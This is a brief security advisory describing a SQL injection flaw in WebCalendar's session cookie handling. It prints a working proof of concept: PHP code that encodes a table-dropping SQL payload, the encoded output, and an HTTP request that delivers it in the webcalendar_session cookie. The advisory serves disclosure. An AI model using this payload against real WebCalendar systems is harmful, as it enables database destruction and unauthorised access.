|
|
WebCalendar SQL Injection Vulnerability
No exploit is required. The following proof of concept is available: <?php include_once 'includes/init.php'; echo encode_string("'; drop table foo; select 'a|zzabcdefg"); ?> output: 7c8c3a738e858f4199b6b386743c7c8e906075c47f7b817993414cb6cd94897d7882858abbb8 attack payload: telnet example.com GET /login.php HTTP/1.1 Cookie: webcalendar_session=7c8c3a738e858f4199b6b386743c7c8e906075c47f7b817993414cb6cd94897d7882858abbb8 |
|
Privacy Statement |